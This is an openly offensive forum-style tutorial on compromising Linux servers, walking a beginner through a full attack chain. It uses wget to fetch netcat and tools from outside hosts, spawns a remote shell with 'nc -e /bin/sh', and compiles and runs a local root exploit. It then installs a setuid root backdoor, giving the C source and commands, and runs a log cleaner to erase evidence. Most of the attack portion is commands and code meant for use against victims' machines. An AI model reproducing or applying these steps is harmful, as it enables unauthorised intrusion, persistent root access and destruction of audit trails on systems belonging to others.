Rooting Unix Boxes For Beginners Tutorial Writen By w3tw0rk root@shell~# Hello and welcome to w3tw0rks tutorial on rooting unix boxes. Today we will learn a few fundementals on what it takes to root a your box! In Todays Tutorial we will be using a linux box. Required for this tutorial: Code: Access to a shell – Upload by any-means a shell onto a box mig-log cleaner – http://b14ck1c3.freehostia.com/miglc Netcat – http://www.vulnwatch.org/netcat/nc111nt.zip Netcat(unix) – http://b14ck1c3.freehostia.com/nc Local Root Exploit – http://jshooter.by.ru/xpl/ half a brain willingness to learn Now that you have all that in order lets begin. Go to the path of or access your shell by whatever means nessecary. Make sure that your shell is in a writable folder just to make things easy for us. In our case today for this tutorial we will be using storm7shell not exactly my favorite but will get the job done none the less. An example of this location would be something like: Code: http://target/youshell.php Now that we are on your shells page we want to find out what os this box is running and what version the kernel is. In our case it’s linux 2.6.8. So we will want to find a local root exploit for this kernel version of the linux os. What we want to do now that we have our local root exploit for our kernel is spawn a shell so that we can talk to the victim’s box and run our commands without interuption, But how are we suppose to do that? This can be done by using a tool called Netcat. So now that we have a copy of Netcat we will go to the shell, Find the command execution area of the shell and enter: Code: wget http://b14ck1c3.freehostia.com/nc What this will do is download the file of Netcat i have pre-compiled and hosted for you onto the victim box to the location of your shell. Once we have the download complete we will want to chmod it so that our user has access to run it. which can be done by entering: Code: chmod +x nc What this does is grants everyone (user, group and other) execute permission, and the command to the file nc which we had just previously downloaded onto the box with the wget command. Now that we have nc installed on both the victim machine and your own it’s time to make our connection. How Do we make a connection with nc? In the command execution area of your shell enter: Code: ./nc -l -p 8080 -e /bin/sh (shell can be /bin/sh or cmd.exe for example) And then on the netcat installed on your pc you will want to enter: Code: nc VictimIP Port *in our case 8080* eg 123.123.123.123 8080 What this will do is cause the netcat on the victims box to listen on port 8080 and shovel back an interactive shell for you once you make the connection from which you typed: Code: nc victimip port Now that We have our interactive shell spawned we can start to prepare the box for rooting. First we will want to get our local root exploit onto the box and get it compiled if it’s not already. This can be done by once again using that nifty wget command we learned about in the previous steps. Code: wget http://yoursite/xpl What we have done is now downloaded your exploit. If your exploit is not already compiled you will need to compile it in order to run it. Compiling your exploit can be done by using the gcc, like so: Code: gcc xpl.c -o xpl;chmod +x xpl This will compile your xpl.c and output it into a file called xpl wich will be the compiled copy of your exploit and then chmod xpl. Now you are ready to run your exploit and get your root on. The exploit will vary on their usage so make sure you have an understanding of the root exploit you are using. You can run your xpl file by entering in: Code: ./xpl Wait until your exploit is finished running once it is done enter: Code: whoami What the whoami command does is tells you who you are if this tells you root then you xpl has done it’s job and you now have root priv’s on the box. or you can type: Code: id which will give you something like: Code: uid=0(root) gid=0(root) groups=500(apache) or something similar And now you can do your happy dance. Now that we have rooted the box and finished humiliating ourselves by dancing around we want to make sure that we can come and go as we please without all the hassel of rooting the box over and over. So we will want to create some kind of backdoor. we can make this happen with few lines of code: Code: #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> int main( void ) { setuid( 0 ); system( „/bin/bash“ ); return 0; } Compile it and change permissions: Code: root@foobar /root# gcc -o .bkdr main.c root@foobar /root# chown root:root .bkdr root@foobar /root# chmod +s .bkdr Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferrably in the $PATH) and if you execute it as another user: Code: raif@foobar /home/raif$ /usr/local/bin/.bkdr root@foobar /home/raif# whoami root Now you have your access back. Alright we are almost completed our mission we have successfully rooted our victims box created our backdoor now all we need to do is wipe our tracks that we left in the logs and be on our way. This can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner. which you can get here: Code: http://b14ck1c3.freehostia.com/miglc Once again we can use our wget command to upload our logcleaner to the rooted box. Code: wget http://b14ck1c3.freehostia.com/miglc;chmod +x miglc now just run the logcleaner Code: ./miglc The mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleaner so you may choose how exactly you want to clean the logs with the commands given to you. I hope you enjoyed my tutorial and learned something from it as well. Good luck to you all. -w3tw0rk